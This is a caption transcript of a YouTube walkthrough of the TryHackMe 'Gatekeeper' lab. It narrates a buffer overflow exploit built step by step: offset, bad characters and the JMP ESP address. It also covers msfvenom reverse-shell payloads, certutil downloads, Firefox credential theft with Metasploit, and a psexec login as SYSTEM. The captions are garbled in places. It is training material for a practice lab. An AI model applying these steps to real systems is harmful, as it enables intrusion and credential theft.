TryHackMe Gatekeeper Walkthrough - Buffer Overflow

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everybody and today we'll be doing gatekeeper on try hack me and um this is an awesome room that requires you to write out your own buffer overflow script so we can actually just do that so um why don't we first just start painting this machine to make sure it's up and it is up and why don't we use threaded 3000 i'm not sure if that works yeah and we can just do python three threaded three thousand dot pi the tool will be in the description below let me start that off it's already finding smb um i guess we can check that out even while it's running but we'll just let this run out and see what shows okay and we can see that it is done the port scans done and just type in one and that'll start the nmap on it so automatically run nmap for us okay and we can see that the unwrap scan is done and we can just take a look at it all right so we do see smb um we can see it's a windows machine it might be a web server um you also see this elite not sure what that is on port 31337 um we can also see microsoft rpc okay so that's great um why don't we check out that smb first so smb client dash l let me just grab the ip address which we can just do from try hack me okay and we can see four shares admin c ipc and users let me check out that users so we can get rid of this dash l and we could just put in users all right now we're here we can ls we can see share so why don't we go and share gatekeeper that exe so we can em get that and just like that okay now we can just move that into our directory gatekeeper into walkthrough okay so now um it is a dot exe so we can't run it on linux so why don't we put that onto our windows machine which you can have your own virtual machine for it or you can just use your windows that you're already using um so why don't we go into that walkthrough directory and to download it onto our windows machine we can just start up a a python web server and we just start util so why don't we just minimize this and we can come over here and why don't we just go to the command prompt first you got to make sure your antivirus is off your windows defender and your antiviruses are off mine's already off because i was doing this room earlier and you can probably create your own folder for it um i'm just gonna cd into gatekeeper i think that's what i called it it's in my downloads folder and then it's in gatekeeper okay so you can see nothing's in here why don't we just start doing that you do cert util url cache f now we need to grab our ip uh you'll probably want to grab your ether0 ip address not your ton zero so we can just do that http colon slash slash you can paste that in there on port 80 and it was called gatekeeper.exe and we'll just call it gatekeeper.exe let's see start util completed successfully you can see gatekeeper right over here okay so why don't we open up gatekeeper just do that gatekeeper listening for connections all right so why don't we netcat to that um port let me just grab this the ip address netcat dash v for the bose let me place the ip address in here and we'll also need to get the port number which was three one three three seven so we're just connecting to this uh ip address on this port right now we'll see what shows up and um if we come back over here we can see nothing happened let's just type in um test it says hello test so it's actually responding with something um nothing's really showing up over there we can try to type in something like hello and it seems to be just repeating this message hello and whatever you type what three exclamation marks so all right guys i made a mistake over there so you're not supposed to connect to this one supposed to connect your own ip address so we just ice it out there no wonder we weren't getting anything so uh yes you're just gonna need to close out of this for a second open up command prompt you can need to do ipconfig and we'll need to grab your own ip address of your machine which is this one if you're on ethernet um you can just grab that oops and you can just go back over here netcat to that on port 31337 okay that did not work try that again see if we have the right ip address should be the right one this one right here netcat on three one three three seven unknown host i'm not sure why that's happening um shouldn't be this one should be this one is gatekeeper not open right now oh it's good it's because gatekeeper is not open no wonder all right sorry for that guys messed it up so many times in this video uh we're gonna do four three one three three seven there we go now it's working if we do test as you can see it says hollow test over here bytes received five bytes sent 14 and um you can see for uh you can see we typed in test so yeah why don't we see if we can put in a bunch of a lot of characters and see what happens then so um we can do print we just type in python here it'll put us into this python thing and just print a times we can just do 1000 okay and now we can also start immunity debugger and now you don't have that you guys can download it i'll probably leave it link in the description if i remember but yeah so we can just um click file over here attach you can see where's gatekeepers right over here and just click attach and should something should pop up come on yes and it's done all right so now you want to start it by just clicking this button over here you can see it's running down here so why don't we put in a ridiculous amount of a's so we just zoom in over here grab these a's come over here we can netcat back to that a ridiculous amount of ace you see we don't actually get a response if we look over here we can see nothing shows up all right so um you can see that i should crash the program so that's nice um now we just have to find out where it's actually crashing so why don't we restart this gatekeeper and i'll start with the debugger again attach and we can start gatekeeper wherever that is there it is we'll just wait for that to load up come on okay you can see it's running it's listening for a connection and we can just do netcat to that and we just do maybe a hundred days um let's see what it's crashing let's just do that over again print a times 100 so that's a hundred days you just grab this okay you can see that actually worked it didn't crash anything everything's fine uh let's see if we can do print a times 200 we can just find out um where it's actually crashing we could write it like a script to do this by itself but um let's just see what happens um nothing's showing up okay so that means it crashed send failed and we say mini d debugger is lighting up over here you see four one four one four one okay so that's pretty much um a's that means it's a bunch of a's so it worked we overwrote the eip and if you guys don't know what this is and what i'm talking about you guys can check out the cyber mentors buffer overflow made easy or you can check out his pr uh practical ethical hacking course on udemy and that's really really helpful um so yeah so we overwrote the eip but we need to find out where we overwrote the ip so we there's actually like a metasploit module that we can use that creates a pattern and you can do this so why don't we just start this up we're going to just do gatekeeper again also startup immunity debugger again we'll just attach this to gatekeeper um we'll let that run so the mesh deploy we can just do user oh okay um it's just exiting me out okay so it's ready so we just do user share metasploit framework we can do tools exploit exploit pattern create that ruby okay now we just do dash l and uh the amount of bytes were crashed so we crashed it at 200 bytes and i should give this random string of characters that we can just copy and why don't we come back over here clear and we can netcat back over here we'll start by immunity debugger you see it's paused right now we'll start it up all right and now we can type that in there you see crashed it and we come back to immunity debugger you see we have this eip value over here nine six five four one three eight we just copy that and we come back over here and we use another metasploit module we can do user share metasploit framework tools exploit pattern offset we need to find the offset which is where it crashes so i'm going to crash at 200 bytes and then dash q for the eip value which is what we grabbed from over here um i am recording that's great okay and now we just type that in you can see we found an exact match at 146. so it crashes at 146 bytes so it's awesome and now we can try to see if we actually overwrite the ip right how do we do that well earlier you saw uh four one four one four one right that's a bunch of a's like we said so why don't we see if we can overwrite the eip with just b's okay so we can just we can create a script for this um we might walk through directory we can just nano um bof buffer overflow.pi and why don't we just put in our shebang here just let them know there's a python script we need to import sys and import socket now i do recommend you watch some sort of python tutorial first if you have no idea what this is because i'm not i'm not that good i'm not that good for overflows too so um don't expect the perfect explanation so um now that we've imported cis import socket why don't we create a buffer variable so this buffer will store of a certain value now we'll just do a bunch of a's right and we put this b here for bytes so we're changing this into bytes so um and we can do times 146 right because we got 146 from that um from our meta split tool uh we found the offset and that's 146. we'll do plus in bytes again we'll do b times four so why are we doing b times four right because um the eip is four bytes long so we'll just do b times four and what should happen in immunity debugger is we can see for the eip it'll be four two four two four two four two right um because that's uh for b for two four two is b so why don't we create that buffer variable and what else do we have to do we create that buffer variable but how do we send it to them right we need to connect okay so what do we do we use netcat to connect right we can just we can have a try so try this and that doesn't work i'll do something else so we'll do s equals to socket that socket in parentheses socket dot a f underscore inet comma socket.sockstream so what does this mean uh socket.afi.afinet is pretty much your ip address and then socket.stream is the port okay we're setting up to s so what do we need to do now we need to connect to it right we'll just do stat connect we got s over here right and now we need to set something inside what do we need to set we need to set the ip address right and the port so the ip address we need to set that to the um our windows ip address and i think i remember it 1921680110 and then you'll need to set the port which is 31337 okay so now that we connected to it what do we need to do we need to send them something right we need to send them the um the a's and the b's so how do we do that we'll just do s dot send so we'll send it to this ip address on that port we'll just add that buffer variable because we already set the variable right it's a 146 a's and four b's so we'll just do buffer plus in bytes um slash r slash and backslash our backslash n and what this is called carriage return and it's pretty much equivalent to pressing enter on windows so okay now we'll just do s dot close we'll just close out of that and we'll just do except over here because we put in try statement which means try this and if this doesn't work i'll do something down here so we can just do print um air oops error and we'll just do system exit so close out of it okay so that's nice and we'll see we started up um our gatekeeper and everything we'll restart this gatekeeper and we'll also start up the immunity debugger we'll do attach gatekeeper attach okay now let's start it up it's running now let's run our script so we'll do python bof the you can see something went wrong invalid syntax okay what did i do wrong ah has to connect oh i forgot to put it in um quotes so in your ip address over here you'll want to put this into quotes um just like that let's rerun it and you see it executed over here you can see four two four two four two four two so that means we overwrote the ip with the b's right so that worked so um what do we do now we need to find bad characters so when creating a payload we don't wanna use a bad character otherwise it'll mess up and it'll fail so how do we do that we'll need to um first we need to get a list of bad characters um and we can just google that so we'll just google buffer overgrow bad characters list okay so bad character is less buffer overflow you see this one bulb security with that load okay see we have a list of bad characters we'll just copy this come back over here why don't we just um nano dof that pi we'll just create a bad very bad bad characters variable so we'll just do this over here just paste it in uh we'll turn all these into bytes so let's put b oops okay so now that works and we need to also send this with s that send right we need to send it along with our a's and b's we also need to send the um bad characters over so we'll just do plus bad chars plus and we'll do the carriage return and that should be it so why don't we restart our immunity debugger and everything um we'll just do gatekeeper we'll also do the immunity debugger okay i'm we'll do attach just type press g and we'll do attach and okay it's pause we'll just press run now we'll come back down here now we'll run our script again python bof dot pi let's see it execute it successfully crash the program for two is again so um to find the bad characters what we need to do is come over here to this esp right right click it and click follow in dump okay you can see it's right here it starts over here uh zero one zero two three four five six seven now i understand it's really really small i'm pretty sure there's a way to make a bigger uh text i'm not sure how yeah it's pretty small and but you'll pretty much wanna check through all these characters and make sure nothing's wrong in there so um by default the null byte um x00 that will always be a bad character so just remember that when we're making our payload so you can just check through all these individually to see if anything's wrong so you see zero one zero two three four five six seven eight nine uh and you see zero zero um there should be zero a so i'm not sure if that's a bad character or not uh but it's okay we'll just add that to our bad characters let's just in case i'm gonna see b c d e f ten 11 12 13 14 it'll just keep going on and on um you can check through all these but i already know because i already did it um so yeah so now that that's fine so now what do we need to do now that we found the bad characters what we need to do is find the right module to attack so um we'll do that with mona modules and i'll leave the link to that the github in the description below um also you guys should watch buffer overflows made easy by cyber mentor or his practical ethical hacking course he goes over this stuff way better than i ever can so why don't we do that um we'll restart immunity debugger we'll start gatekeeper we'll start a community debugger and we can check to find out what module we should attack so why don't we attach this to gatekeeper and once you install it you'll be able to run from unity debugger so let's let that start up okay and we'll just do down here we can just do exclamation mark mona modules all right okay um so now you get the module information you gotta find out which module you want to attack right uh it's best to pick one that's false like everything here false false false all across we don't actually see that but this one's as close as we can get because everything's false here except for this one and it's actually gatekeeper.exe so we'll attack gatekeeper.exe so um what you want to do now is you want to find the jump esp you want to find the return address pretty much so um the way you do that again please watch um buffer overflows made easy because i'll explain it way better than i can so we'll do fine dash s and we'll do x f f x e4 it's pretty much ffv4 which is the um jump esp dash m for the module and gatekeeper you can see right here the results um you see it right over here let's see you can see xfe4 and you can over here you can see the name the module name so why don't we just copy that down so it's zero x zero eight zero four one four c three just copy that we'll come back over here nano or buffer overflow and we also need to delete this bad characters i'm not sure how to do that from nano um so i'll just use g edit to do that so i can select all of this and delete it all at once just delete that save that okay that one there now electro overflow again all right so now what do we need to know uh we need to attack that certain module so over here uh we can just type in something we'll just comment it out because we have to change it right because um we need to write this backwards pretty much so how do we write this backwards so first why don't we get rid of these b's over here i don't think we'll need that um so plus and again we need to do some bytes so how do we write it backwards we'll need to do a backslash x c3 right two characters and then that and we'll d backslash we'll need to do x again 14 backslash x04 backslash x08 okay so that's how we write it backwards so now what do we need to do now that we found the right module to attack uh what we need to do now is actually try to exploit this machine right uh so first we'll need to add something called the no op which the cyber mentor explains it's kind of like padding um so we just do that with plus oh b uh for bytes and we'll just do x 90 times 32 okay well also but now what do we need to do is we need to encode shell code right shell code so how do we do that we need to use msf venom you know so let me come back over to pentestat ws i'll make things a lot easier for us um ws and we'll just come over here to venom builder if this will ever load this is really slow come on load up for me okay now i'll come over here to venom builder and i already set this up already so you'll probably see it but we'll do windows shell slash reverse tcp we'll set the l host to our um ip address our try hack well actually no we'll need to set it to our eth0 address because we're first we have to attack our machine we're attacking our windows machine we're not attacking gatekeeper yet let's hope it's not running out of time we'll just add an hour um we'll set that to zero address we can just set it to 6969. it's the l port bad characters we went over this the null byte will always be a bad character i didn't see zero a in there so i'm not sure if that's a bad character or not but i'll just put it in so format we'll just do python out file we don't want to add it to any file unless you want to i don't see the point in that so now we'll just copy this command come over here um let that msf venom run i'll see the plus and we'll wait for ms7 to complete and it completed okay and you can see it's turning it into bytes by itself already so we can just copy all this come back over here to our um script let's paste this in now um this is already set up for us you can just copy and paste it directly because buff it's setting it to nothing at first and it's adding to it plus equals means whatever buff is right now add this to buff right so it's putting it all in but for us so we can just come back over here and um we'll just plus buff right we'll plus buff which is the shell code okay so everything should be completed for us um for the bad characters yeah we don't need that in here so we'll just remove that so we'll just include the buffer and it will include a carriage return and that should be good for us it should give us a shell so let's just make sure it's running properly yes it's running uh python eof dot pi oh shoot we we did not set up a listener so uh that's probably why it failed okay uh we'll close out of this gatekeeper i'll start with community debugger so i'll just actually start up msf console clear console i'm not sure why midi debugger looks like that community debugger okay that is weird why does it look like [Music] this whatever yeah whatever let's just attach the gatekeeper anyways um and we'll come over here we'll use use multi handler we're done with the mini debugger anyways okay just use multihandler we'll set our payload to windows shell reverse tcp we'll set our elvos to 192.168.10106 which is our zero address on our cali machine so i'll put the 6969 we'll start running that and we can see that our um yeah it's up gatekeepers up so we'll just start that up we can just do python be off.hi that should give us a shell let's give us a shell let's check our script again see what we did wrong i think should be right i'm not sure what we did wrong um c3 14 0408 so that's right um connecting correctly so what do we do wrong do we do our let's try this again did it even crash i should have been crashed i think it did let's start the gatekeeper again just one more time okay yeah and we got a command show i don't know what happened the first time um okay so who am i we should see pc1 which is my windows um so it worked everything worked so what do we need to do now we need to actually attack the um the actual try hacking gatekeeper right so why don't we do that um we can just uh exit out of this um we can come back so we can't just use the same script okay we need to change a couple things we need to change our first when we change our payload to our lhost um so why don't we just do five config we'll grab our try hack me ip address and we'll just set that up over here we'll do 9696 and we'll just copy this and paste that in we'll need to edit our script so you know bof.i um so what do we need to fix we need to change s.connect we need to connect to the actual try hacking machine so why don't we come back over here and grab the ip address paste that in there and everything should be good to go and we also need to change this so let's just copy this g edit we'll delete all this paste this in we'll save it okay it's done all right so now why don't we start the listener where is our okay show options set l host to be what ton zero then we change that o clear run and why don't we just run command shell two opened yes and we got a shell let's just do who am i oops what do we do there who am i we are not into authority system oh man you know i was disappointed at this when i first did the machine i went through all that work and i still want some system but there is pivx here so um that's annoying um if we just do there you can see your user.txt is here so uh why don't we upload well first let's just do who am i slash priv okay see we don't really have anything here why don't we um upload one piece okay so we just play around here it's an opt folder pi web um so we'll just do what i don't want to put it here i'll put in pictures there nothing's here okay cert util url cache dash f http colon slash i need our ip address um so why don't we just do item config copy that come back over here port 80 win ps.exe win ps.exe we'll see if that works okay and now it's completed we'll just do dir win peace.exe so why we run win ps.exe now yeah we see it doesn't it's not starting up right it's not working and i can tell you that this is um on purpose so i'll see if i can background that yeah that's i don't i don't think one piece was supposed to be able to run i wasn't able to get to work on the first time around uh let's see if i can go back into that session yeah it's messed up and it closed okay i'm going to re-exploit it um [Music] run this again whoa python buffer overflow i got a command show okay so why don't we background this and first let's upgrade it to interpreter just so it's easy to work with i'll just do shell to interpreter it usually doesn't work right away i'm not sure something it's still slow sometimes set all hosts to be ton zero set session to me run and this will pretty much upgrade our shell to our interpreter shell okay yeah and that didn't work i'm not sure why um let's see it's still running here um i usually have to wait a while and i don't know it just comes back with something but it's fine we don't really need it right now but um why don't we do search search post windows we'll just do enum applications zero show options and this will enumerate the applications that's on the machine so when we set our session to what three four freya it's three i believe three now let's just run this really session may not be compatible um come on um background css sessions okay i'm not sure if shelton interpreter didn't work um but we can again we can upgrade it a different way why don't we just use msf venom again we'll just do one two three four same ip address we'll change this to interpreter i'm not sure if this will work um characters out format um what is this exe out file to be interpreter we'll just do shield.exe i'll just copy this yeah we'll just kill all jobs oops yeah that worked um let me go back over here and kill this job clear and it worked okay we'll just move the shell.exe to walk through folder see walk through pi web and we'll just go back to the sessions i3 okay and we'll see the dots cd pictures we'll certainly tell this over cert detail address again because i keep forgetting it i never remember the ip address or anything other than cyber second labs because they made it easy to remember oops okay use your arrows uh port 80 we'll grab over shell.exe we'll call it shell.exe come on okay and it's completed okay we're going to background this session let me use multihandler show options set outport to b1234 and set payload to be windows interpreter reverse tcp run j as a job so it's running in the background we'll do session steps right three there shell.exe and we got a material session open so why don't we do session slash i4 the background is first session i4 and we're interpreter and we can just do get uid now we can run interpreter commands let's probably run post windows gather oops windows post windows gather enum applications now it's enumerating applications installed on gatekeeper all right and we actually got something back all right um what's most interesting right now would be um firefox so we can try to enumerate uh we can try to find out what the credentials that are stored in firefox is we can just do that with another um motorsport module we can just do post multi gather firefox creds so now it's grabbing its credentials let's let that run all right and it's done it downloaded all that stuff from this so now we actually need to decrypt this um all these files so why don't we come back over here i have a lot of terminals open uh just cancel this one out delete it okay and i wonder where downloading so if i download it to my oh no where is it where did the download to where did i start metasploit at my gosh i started metasploit somewhere so it should be in here where where's save that um is it here where is it um oh oh it's dot ms4 so it's here okay uh what if we do outside l.a for it so we can just move that ms4 msf4 move that first of all i want to rename it first i'll menu to firefox just so we can actually see it it's right there firefox we can move firefox into our walkthrough directory cd walkthrough let's see firefox ls loot we're going to loot so now we need to decrypt this we can i think we can just search firefox decrypt uh see it's right here i'll leave a link to it in the description too yeah should be this one this is the one yes it is so you just get clone this i already have it but yeah so now we need to rename all this to these names so why don't we just rename this we can just copy this and we can just rename this to what is it like that we need to do this for every single one of these files so we did this one now we need to do this one and like that oops okay um now this one we need to rename that to this and now with the last one just copy this come back over here um plugins okay now that we have all these renamed we can come back over here to cd slash opt and it's in my firefox decrypt ls um and that's firefox decrypt so let's do python firefox decrypt.pi but i'm pretty sure we just include the directory to it so let's do it's our home directory and it's in our walkthrough it's in the firefox and salute enter and you see we got some credentials okay username mayor the person who made this uh room and now we have the password so how do we log in right we saw smb earlier right we saw smb and uh some writable shares so why can't we use ps exec right so let's locate psx it's right over here and we'll just do ps python ps exec that pi uh i forgot how to use this oh boy i think we need these mayor i think it was um colon password at the ip address and so use it yes it is okay great and we should be able to login found writable shares on admin so um that's on smb and it found the writable share and uploaded that file and then we just do who am i went to 30 system that's awesome and uh cd dot cd slash users and there's no admin um there's no admin uh folder uh the root flag is in mayer so that's actually in desktop it's going to go through all these come on so slow okay cd desktop now we can do cd desktop dir you can see that's your root flag right over there all right guys i hope you really enjoyed this video i've certainly enjoyed doing this room uh shout out to you mary you made you're an amazing person and you made an amazing room i really love doing it the privilege escalation was um i was not expecting it when i first did it so um yeah i hope you guys really enjoyed this video i really enjoyed making this video um i think this is the um first medium difficulty room i did on trey hackman that i'm making a video on so it's amazing i really like this room it's actually a free room too my subscription ended i'm still able to do it so um this room is free and i seriously you guys should really do it it's really really fun room and um if you guys like this video please leave a thumbs up and subscribe to me if you haven't and yeah i'll see you guys in the next video bye

Info

Channel: SkillsMasters

Views: 7,769

Rating: undefined out of 5

Keywords: tryhackme, cyberseclabs, hackthebox, gatekeeper, walkthrough, tryhackme gatekeeper walkthrough, tryhackme gatekeeper, tryhackme gatekeeper writeup, buffer overflow, buffer overflows, buffer, overflow, overflows, exploit development, exploit creation, creating exploit, binary exploitation, metasploit, mona modules, what is a buffer overflow, firefox decrypt, application enumeration, bad characters, creating buffer overflow, developing exploit, making exploit, BOF, BOFs, buffers, hacking

Id: ALbNTOOqmsA

Channel Id: undefined

Length: 42min 20sec (2540 seconds)

Published: Mon Aug 31 2020